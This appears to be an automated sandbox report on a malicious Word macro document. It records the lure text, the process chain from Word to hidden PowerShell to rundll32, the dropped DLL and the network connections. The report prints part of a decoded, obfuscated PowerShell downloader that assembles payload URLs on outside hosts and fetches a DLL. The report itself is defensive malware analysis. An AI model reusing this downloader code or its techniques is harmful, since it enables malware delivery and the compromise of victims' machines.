                Source: Yara match | File source: 00000006.00000002.689878857.0000000001091000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 8.2.rundll32.exe.f20000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.rundll32.exe.f40000.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.rundll32.exe.1090000.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.rundll32.exe.1070000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.rundll32.exe.1070000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.rundll32.exe.f20000.1.raw.unpack, type: UNPACKEDPE

                System Summary:

                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                Source: Screenshot number: 4 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. End of document W Screen 1
                Source: Screenshot number: 4 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                Source: Screenshot number: 4 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                Source: Screenshot number: 4 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document. End of document W Screen 1 of 1 O Type here to
                Source: Document image extraction number: 0 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                Source: Document image extraction number: 0 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                Source: Document image extraction number: 0 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                Source: Document image extraction number: 1 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                Source: Document image extraction number: 1 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                Source: Document image extraction number: 1 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                Source: Document image extraction number: 1 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                Powershell drops PE file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll
                Very long command line found
                Source: unknown | Process created: Commandline size = 7856
                Source: unknown | Process created: Commandline size = 7765
                Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 7765
                Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\SysWOW64\Ezfa\
                Source: v22Pc0qA.doc.doc | OLE, VBA macro line: Private Sub Document_open()
                Source: VBA code instrumentation | OLE, VBA macro: Module Dk5att0cu_9jsb, Function Document_open | Name: Document_open
                Source: v22Pc0qA.doc.doc | OLE indicator, VBA macros: true
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 1000B078 appears 46 times
                Source: 00000004.00000002.689082292.00000271130C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                Source: 00000004.00000003.685190093.000002712B8A4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                Source: 00000004.00000002.700514213.000002712B630000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                Source: 00000004.00000002.698145971.0000027114D5D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                Source: 00000004.00000002.697286565.0000027114829000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                Source: 00000004.00000002.689101356.00000271130F0000.00000004.00000040.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                Source: 00000004.00000002.700460639.000002712B620000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                Source: Chpieog.dll.4.dr | Static PE information: Section: .rsrc ZLIB complexity 0.999260733061
                Source: classification engine | Classification label: mal100.troj.evad.winDOC@16/14@3/7
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F590E0 CreateToolhelp32Snapshot,8_2_00F590E0
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_01
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\{6A94A75C-BF67-4F59-849A-17E54DA728FF} - OProcSessId.dat
                Source: v22Pc0qA.doc.doc | OLE indicator, Word Document stream: true
                Source: v22Pc0qA.doc.doc | OLE document summary: title field not present or empty
                Source: v22Pc0qA.doc.doc | OLE document summary: edited time not present or 0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File read: C:\Users\desktop.ini
                Source: C:\Windows\System32\msg.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: unknown | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
                Source: v22Pc0qA.doc.doc | Virustotal: Detection: 72%
                Source: v22Pc0qA.doc.doc | Metadefender: Detection: 44%
                Source: v22Pc0qA.doc.doc | ReversingLabs: Detection: 86%
                Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
                Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD [Base64-encoded command omitted]
                Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknown | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD [Base64-encoded command omitted]
                Source: unknown | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
                Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
                Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ezfa\bvb.lli',RunDLL
                Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD [Base64-encoded command omitted]
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
                Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
                Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ezfa\bvb.lli',RunDLL
                Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Window found: window name: SysTabControl32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
                Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmp
                Source: v22Pc0qA.doc.doc | Initial sample: OLE summary subject = extensible Automotive generate withdrawal Wooden Global architecture

                Data Obfuscation:

                Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
                Source: v22Pc0qA.doc.doc Stream path 'Macros/VBA/Lxvinhyq0hu0i' : High number of GOTO operations
                Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Lxvinhyq0hu0i Name: Lxvinhyq0hu0i
                PowerShell case anomaly found
                Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD 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
                Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                Suspicious powershell command line found
                Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10013BFB LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,6_2_10013BFB
                Source: Chpieog.dll.4.dr Static PE information: real checksum: 0x457fa should be: 0x416e4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFA34A3493C push edx; retf 4_2_00007FFA34A34A02
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFA34A34B0B push eax; retf 4_2_00007FFA34A34B19
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFA34A33EFB push es; retf 4_2_00007FFA34A33F0A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFA34A342A3 push eax; retf 4_2_00007FFA34A342B1
                Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_1000B0BD push ecx; ret 6_2_1000B0D0
                Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10007BCA push ecx; ret 6_2_10007BDD

                Persistence and Installation Behavior:

                Creates processes via WMI
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll
                Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Ezfa\bvb.lli

                Hooking and other Techniques for Hiding and Protection:

                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ezfa\bvb.lli:Zone.Identifier read attributes | delete
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3647
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5292
                Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_6-10144
                Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_6-10492
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3976 Thread sleep count: 3647 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3684 Thread sleep count: 5292 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6700 Thread sleep time: -7378697629483816s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 6200 Thread sleep time: -210000s >= -30000s
                Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
                Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00F4A461 FindFirstFileW,8_2_00F4A461
                Source: svchost.exe, 0000000F.00000002.762491532.0000027963AFC000.00000004.00000001.sdmp Binary or memory string: $@Hyper-V RAW
                Source: powershell.exe, 00000004.00000002.701205155.000002712BCA0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.710854626.0000021703940000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.728166492.00000202A9140000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.763462020.0000027964A00000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: powershell.exe, 00000004.00000002.701036480.000002712B822000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWB7%SystemRoot%\system32\mswsock.dllBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwBy
                Source: svchost.exe, 0000000F.00000002.762477860.0000027963AED000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000004.00000002.701205155.000002712BCA0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.710854626.0000021703940000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.728166492.00000202A9140000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.763462020.0000027964A00000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: powershell.exe, 00000004.00000002.701205155.000002712BCA0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.710854626.0000021703940000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.728166492.00000202A9140000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.763462020.0000027964A00000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: svchost.exe, 0000000F.00000002.762378344.0000027963A82000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@
                Source: powershell.exe, 00000004.00000002.701205155.000002712BCA0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.710854626.0000021703940000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.728166492.00000202A9140000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.763462020.0000027964A00000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node (graph_6-10494)
                Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node (graph_6-10232)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10002460 RunDLL,LoadLibraryA,ShowWindow (ShowWindow call repeated; repetitions omitted)
                Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10007528 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10013BFB LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer
                Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00F4166C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10004500 GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10009F26 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10006F64 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

                HIPS / PFW / Operating System Protection Evasion:

                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 97.120.3.198 80
                Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 70.180.33.202 80
                Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 50.116.111.59 144
                Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 173.249.20.233 187
                Encrypted powershell cmdline option found
                Source: unknownProcess created: Base64 decoded $CrA = [TyPE]("{3}{1}{0}{2}" -F 'em.IO.','St','direCtOry','sY') ; SV ("5hv"+"1z") ([TyPE]("{1}{2}{4}{3}{0}"-f'nAGeR','sYstE','M.Net.SeRVic','A','epOiNTm') ) ; $Avnn0uf=(('Ty7n'+'0')+'sc');$H2q6qpz=$Umcrug1 + [char](64) + $Yvk6hcp;$N667cll=('P'+('4m'+'s')+('v'+'rs')); ( GeT-VaRIaBLE ("C"+"ra") ).VaLUE::"cR`e`AtedIr`Ectory"($HOME + (('{0}F'+('2n'+'efq')+'6{0}P'+('rs'+'2nd')+'h{0}')-F [CHaR]92));$K00aa2c=('Wh'+('p'+'oj')+'lo'); ( geT-VAriABle ("5HV"+"1z") ).VaLUE::"sEcURItypR`OToC`OL" = ('T'+('l'+'s12'));$Fz5dygs=('B'+('p'+'825i'+'v'));$Q4a8l15 = (('Ch'+'pie'+'o')+'g');$Uab688o=('K'+'y'+('j8x'+'oq'));$Lr0w5la=('P'+('9'+'lc7f')+'u');$Zrwjh9k=$HOME+(('{0'+'}F2n'+'ef'+'q6{0}Prs2'+'ndh{0}')-f[CHaR]92)+$Q4a8l15+('.d'+'ll');$Nbmxfxv=(('Aw'+'n')+('g'+'0z6'));$V0_ri0n=New`-oB`jEcT neT.webCLIeNt;$Nkq_g0q=(('h'+(('ttp:'+'J)(3s'))+(('2'+')('))+(('J'+')(3s2'+')(arq'))+'ui'+('v'+'opop.c')+('o'+'m'+'.brJ')+((')'+'(3s'))+(('2)'))+(('(i'))+'n'+('dex_htm_'+'f'+'il'+'esJ')+((')'+'(3'))+(('s'+'2)'))+(('(Kx'+'hJ'))+((')('+'3'))+(('s2)(@ht'+'t'+'p'))+(('s:J'+')(3s2'))+((')(J'+')'))+'('+'3s'+(('2)'))+(('(cairoc'+'a'+'d'))+'.c'+(('om'+'J)('+'3'))+(('s'+'2)(c'))+('gi'+'-'+'binJ')+((')(3s2)('+'1P'+'B'+'B'))+(('J)(3s2)'+'('))+'@'+('h'+'tt')+'p'+'s'+((':J)(3s2'+')(J'+')(3'))+'s'+(('2)('+'w'))+('ww.'+'i'+'satechno')+'l'+('o'+'gy.')+(('comJ'+')(3s'+'2)'+'(t'+'raining'+'J)('+'3'))+'s2'+((')'+'(bJ'+')('))+(('3s2'+')'))+(('(@ht'+'t'))+'p'+':'+(('J)'))+'('+'3'+(('s2'+')('))+(('J)'))+(('(3s'+'2')
                Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $CrA = [TyPE]("{3}{1}{0}{2}" -F 'em.IO.','St','direCtOry','sY') ; SV ("5hv"+"1z") ([TyPE]("{1}{2}{4}{3}{0}"-f'nAGeR','sYstE','M.Net.SeRVic','A','epOiNTm') ) ; $Avnn0uf=(('Ty7n'+'0')+'sc');$H2q6qpz=$Umcrug1 + [char](64) + $Yvk6hcp;$N667cll=('P'+('4m'+'s')+('v'+'rs')); ( GeT-VaRIaBLE ("C"+"ra") ).VaLUE::"cR`e`AtedIr`Ectory"($HOME + (('{0}F'+('2n'+'efq')+'6{0}P'+('rs'+'2nd')+'h{0}')-F [CHaR]92));$K00aa2c=('Wh'+('p'+'oj')+'lo'); ( geT-VAriABle ("5HV"+"1z") ).VaLUE::"sEcURItypR`OToC`OL" = ('T'+('l'+'s12'));$Fz5dygs=('B'+('p'+'825i'+'v'));$Q4a8l15 = (('Ch'+'pie'+'o')+'g');$Uab688o=('K'+'y'+('j8x'+'oq'));$Lr0w5la=('P'+('9'+'lc7f')+'u');$Zrwjh9k=$HOME+(('{0'+'}F2n'+'ef'+'q6{0}Prs2'+'ndh{0}')-f[CHaR]92)+$Q4a8l15+('.d'+'ll');$Nbmxfxv=(('Aw'+'n')+('g'+'0z6'));$V0_ri0n=New`-oB`jEcT neT.webCLIeNt;$Nkq_g0q=(('h'+(('ttp:'+'J)(3s'))+(('2'+')('))+(('J'+')(3s2'+')(arq'))+'ui'+('v'+'opop.c')+('o'+'m'+'.brJ')+((')'+'(3s'))+(('2)'))+(('(i'))+'n'+('dex_htm_'+'f'+'il'+'esJ')+((')'+'(3'))+(('s'+'2)'))+(('(Kx'+'hJ'))+((')('+'3'))+(('s2)(@ht'+'t'+'p'))+(('s:J'+')(3s2'))+((')(J'+')'))+'('+'3s'+(('2)'))+(('(cairoc'+'a'+'d'))+'.c'+(('om'+'J)('+'3'))+(('s'+'2)(c'))+('gi'+'-'+'binJ')+((')(3s2)('+'1P'+'B'+'B'))+(('J)(3s2)'+'('))+'@'+('h'+'tt')+'p'+'s'+((':J)(3s2'+')(J'+')(3'))+'s'+(('2)('+'w'))+('ww.'+'i'+'satechno')+'l'+('o'+'gy.')+(('comJ'+')(3s'+'2)'+'(t'+'raining'+'J)('+'3'))+'s2'+((')'+'(bJ'+')('))+(('3s2'+')'))+(('(@ht'+'t'))+'p'+':'+(('J)'))+'('+'3'+(('s2'+')('))+(('J)'))+(('(3s'+'2')Jump to behavior
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD [Base64-encoded command omitted]
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
                Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD [Base64-encoded command omitted]
                Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD [Base64-encoded command omitted]
                Source: rundll32.exe, 00000008.00000002.922961365.0000000003360000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: rundll32.exe, 00000008.00000002.922961365.0000000003360000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: rundll32.exe, 00000008.00000002.922961365.0000000003360000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: rundll32.exe, 00000008.00000002.922961365.0000000003360000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,6_2_10010000
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_10011C13
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,6_2_1001106A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,6_2_10011874
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_10011C7A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,6_2_10011CB6
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,6_2_1001190C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,6_2_10011980
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,6_2_10013DAF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,6_2_10014DB7
